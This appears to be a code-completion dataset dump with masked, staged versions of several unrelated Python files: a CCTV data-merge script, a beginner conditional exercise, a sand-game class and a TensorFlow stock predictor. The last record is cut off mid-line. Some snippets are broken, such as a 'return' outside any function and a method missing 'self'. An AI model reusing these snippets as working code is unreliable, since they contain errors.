{ "blob_id": "ea2e9399a8384600d8457a9de3f263db44dc883d", "index": 752, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\n<mask token>\ncctv.drop(['구분'], axis=1, inplace=True)\n<mask token>\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-3": "<mask token>\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv('./dataset/cctv_origin.csv', encoding='EUC-KR')\ncctv = cctv.iloc[1:, :2]\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5,\n '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11,\n '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15,\n '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구':\n 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\ncctv = cctv.rename(columns={'총계': 'cctv_num'})\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: ''.join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-4": "import pandas as pd\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv('./dataset/cctv_origin.csv', encoding='EUC-KR')\ncctv = cctv.iloc[1:, :2]\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5,\n '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11,\n '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15,\n '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구':\n 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\ncctv = cctv.rename(columns={'총계': 'cctv_num'})\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: ''.join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-5": "import pandas as pd\n\n# 데이터 로드\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv(\"./dataset/cctv_origin.csv\", encoding=\"EUC-KR\")\n\n## 데이터 전처리\n# 데이터 추출\ncctv = cctv.iloc[1:, :2]\n\n# 구 매핑\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5, '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11, '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15, '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구': 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\n\n# 컬럼 이름 변경\ncctv = cctv.rename(columns={'총계': 'cctv_num'})\n\n# 데이터 타입 변경\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: \"\".join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\n\n# 조인\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\n\nprint(new_data.info())\n# 저장\nnew_data.to_csv(\"./dataset/train_add_cctv.csv\", header=True, index=False)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
alien_color = 'green' if alien_color == 'green': print('you earned 5 points') alien_color2 = 'yellow' if alien_color2 == 'green': print ('your earned 5 points') if alien_color2 == 'yellow': print('Right answer') # 5.4 alien_color = 'green' if alien_color == 'green': print('you earned 5 points') else: print('your earned 10 points') # 5.5 alien_color = 'green' if alien_color == 'green': print('you earned 5 points') elif alien_color == 'yellow': return ('your earned 10 points') else: print('your earned 15 points')
normal
{ "blob_id": "30e4c4c5ef944b0cd2d36b2fe5f7eee39dff1d16", "index": 6511, "step-1": "<mask token>\n", "step-2": "<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\n<mask token>\nif alien_color2 == 'green':\n print('your earned 5 points')\nif alien_color2 == 'yellow':\n print('Right answer')\n<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\nelse:\n print('your earned 10 points')\n<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\nelif alien_color == 'yellow':\n return 'your earned 10 points'\nelse:\n print('your earned 15 points')\n", "step-3": "alien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nalien_color2 = 'yellow'\nif alien_color2 == 'green':\n print('your earned 5 points')\nif alien_color2 == 'yellow':\n print('Right answer')\nalien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nelse:\n print('your earned 10 points')\nalien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nelif alien_color == 'yellow':\n return 'your earned 10 points'\nelse:\n print('your earned 15 points')\n", "step-4": "alien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\n\r\nalien_color2 = 'yellow'\r\nif alien_color2 == 'green':\r\n print ('your earned 5 points')\r\nif alien_color2 == 'yellow':\r\n print('Right answer')\r\n\r\n# 5.4\r\nalien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\nelse:\r\n print('your earned 10 points')\r\n\r\n\r\n# 5.5\r\nalien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\nelif alien_color == 'yellow':\r\n return ('your earned 10 points')\r\nelse:\r\n print('your earned 15 points')\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): <|reserved_special_token_0|> def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None) <|reserved_special_token_1|> <|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): """Removes the particle after one frame """ def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None) <|reserved_special_token_1|> from sand_game.Environment import Environment from sand_game.behaviours.Behaviour import Behaviour class EphemeralBehaviour(Behaviour): """Removes the particle after one frame """ def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None)
flexible
{ "blob_id": "2728c3ab26fbdbaac9c47054eafe1c114341f6f2", "index": 7736, "step-1": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n <mask token>\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-3": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n \"\"\"Removes the particle after one frame\n \"\"\"\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-4": "from sand_game.Environment import Environment\nfrom sand_game.behaviours.Behaviour import Behaviour\n\n\nclass EphemeralBehaviour(Behaviour):\n \"\"\"Removes the particle after one frame\n \"\"\"\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
import numpy as np import pandas as pd import sklearn import sklearn.preprocessing import matplotlib.pyplot as plt import tensorflow as tf from enum import Enum from pytalib.indicators import trend from pytalib.indicators import base class Cell(Enum): BasicRNN = 1 BasicLSTM = 2 LSTMCellPeephole = 3 GRU = 4 valid_set_size_percentage = 10 test_set_size_percentage = 10 df = pd.read_csv('data_2019-01-06.csv') df.sort_values('Date') # function for min-max normalization of stock def normalize_data(df): min_max_scaler = sklearn.preprocessing.MinMaxScaler() df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1)) df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1)) df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1)) df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1, 1)) df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape(-1, 1)) return df # function to create train, validation, test data given stock data and sequence length def load_data(stock, seq_len): data_raw = stock.values # convert to numpy array data = [] # create all possible sequences of length seq_len for index in range(len(data_raw) - seq_len): data.append(data_raw[index: index + seq_len]) data = np.array(data) valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.shape[0])) test_set_size = int(np.round(test_set_size_percentage / 100 * data.shape[0])) train_set_size = data.shape[0] - (valid_set_size + test_set_size) x_train = data[:train_set_size, :-1, :] y_train = data[:train_set_size, -1, :] x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :] y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :] x_test = data[train_set_size + valid_set_size:, :-1, :] y_test = data[train_set_size + valid_set_size:, -1, :] return [x_train, y_train, x_valid, y_valid, x_test, y_test] # show predictions: 0 = open, 1 = close, 2 = highest, 3 = lowest, 4 = volume def show_predictions(ft, y_test_pred): plt.figure(figsize=(15, 5)) plt.subplot(1, 1, 1) plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black', label='test target') plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color='green', label='test prediction') plt.title('future stock prices') plt.xlabel('time [days]') plt.ylabel('normalized price') plt.legend(loc='best') x = 0 error_percent = 5 for index in range(0, len(y_test)): if (abs((y_test_pred[:, ft][index] - y_test[:, ft][index])) / abs(y_test[:, ft][index]) * 100) < error_percent: x += 1 print("Percent of predictions which error is less then {}% = {}%".format(error_percent, x / len(y_test) * 100)) # Calculating the direction between 2 points using true values and predicted values z = 0 distance = 10 for index in range(distance, len(y_test)): if (y_test[:, ft][index - distance] <= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft] [index]) or ( y_test[:, ft][index - distance] >= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][index]): z += 1 print("Percent of correct predicted direction = {}%".format(z / len(y_test) * 100)) plt.show() # choose one stock df_stock = df.copy() df_stock.drop(['Date'], 1, inplace=True) cols = list(df_stock.columns.values) # normalize stock df_stock_norm = df_stock.copy() df_stock_norm = normalize_data(df_stock_norm) # create train, test data seq_len = 50 # choose sequence length x_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len) index_in_epoch = 0 perm_array = np.arange(x_train.shape[0]) np.random.shuffle(perm_array) # function to get the next batch def get_next_batch(batch_size): global index_in_epoch, x_train, perm_array start = index_in_epoch index_in_epoch += batch_size if index_in_epoch > x_train.shape[0]: np.random.shuffle(perm_array) # shuffle permutation array start = 0 # start next epoch index_in_epoch = batch_size end = index_in_epoch return x_train[perm_array[start:end]], y_train[perm_array[start:end]] # parameters CellType = Cell.BasicRNN n_steps = seq_len - 1 n_inputs = 5 n_neurons = 200 n_outputs = 5 n_layers = 2 learning_rate = 0.001 batch_size = 50 n_epochs = 10 train_set_size = x_train.shape[0] test_set_size = x_test.shape[0] tf.reset_default_graph() X = tf.placeholder(tf.float32, [None, n_steps, n_inputs]) y = tf.placeholder(tf.float32, [None, n_outputs]) if CellType == Cell.BasicRNN: layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu) for layer in range(n_layers)] elif CellType == Cell.BasicLSTM: layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu) for layer in range(n_layers)] elif CellType == Cell.LSTMCellPeephole: layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn.leaky_relu, use_peepholes=True) for layer in range(n_layers)] elif CellType == Cell.GRU: layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu) for layer in range(n_layers)] multi_layer_cell = tf.contrib.rnn.MultiRNNCell(layers) rnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32) stacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons]) stacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs) outputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs]) outputs = outputs[:, n_steps - 1, :] # keep only last output of sequence loss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) training_op = optimizer.minimize(loss) # run graph def train_data(model_name): with tf.Session() as sess: sess.run(tf.global_variables_initializer()) saver = tf.train.Saver() for iteration in range(int(n_epochs * train_set_size / batch_size)): x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch sess.run(training_op, feed_dict={X: x_batch, y: y_batch}) if iteration % int(5 * train_set_size / batch_size) == 0: mse_train = loss.eval(feed_dict={X: x_train, y: y_train}) mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid}) print('%.2f epochs: MSE train/valid = %.6f/%.6f' % ( iteration * batch_size / train_set_size, mse_train, mse_valid)) saver.save(sess, 'train_models/' + model_name) def test(model_name): saver = tf.train.Saver() with tf.Session() as sess: saver.restore(sess, 'train_models/' + model_name) y_test_pred = sess.run(outputs, feed_dict={X: x_test}) show_predictions(1, y_test_pred) model = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500', 'train_model_with_layers_4', 'train_model_with_volume', 'model_seq_len_100', "model_GRU", 'model_LSTM_pipehole'] # train_data(model[0]) # test(model[0]) y_new = [] for i in y_test: y_new.append(i[1] * 10000) macd = trend.MovingAverageConvergenceDivergence(y_new) print(macd.calculate()) macd.validate() tt = trend.ExponentialMovingAverage(y_new, 10) print(tt.calculate()) plt.figure(figsize=(15, 5)) plt.subplot(1, 1, 1) plt.plot(np.arange(len(y_new)), y_new, color='black', label='test target') plt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label='test prediction') plt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red', label='test prediction') plt.show()
normal
{ "blob_id": "4379d89c2ada89822acbf523d2e364599f996f8c", "index": 5456, "step-1": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\ndf.sort_values('Date')\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\ndf_stock.drop(['Date'], 1, inplace=True)\n<mask token>\nnp.random.shuffle(perm_array)\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\ntf.reset_default_graph()\n<mask token>\nif CellType == Cell.BasicRNN:\n layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.BasicLSTM:\n layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=\n tf.nn.elu) for layer in range(n_layers)]\nelif CellType == Cell.LSTMCellPeephole:\n layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn\n .leaky_relu, use_peepholes=True) for layer in range(n_layers)]\nelif CellType == Cell.GRU:\n layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.\n leaky_relu) for layer in range(n_layers)]\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\n<mask token>\nfor i in y_test:\n y_new.append(i[1] * 10000)\n<mask token>\nprint(macd.calculate())\nmacd.validate()\n<mask token>\nprint(tt.calculate())\nplt.figure(figsize=(15, 5))\nplt.subplot(1, 1, 1)\nplt.plot(np.arange(len(y_new)), y_new, color='black', label='test target')\nplt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label=\n 'test prediction')\nplt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red',\n label='test prediction')\nplt.show()\n", "step-4": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\nvalid_set_size_percentage = 10\ntest_set_size_percentage = 10\ndf = pd.read_csv('data_2019-01-06.csv')\ndf.sort_values('Date')\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if 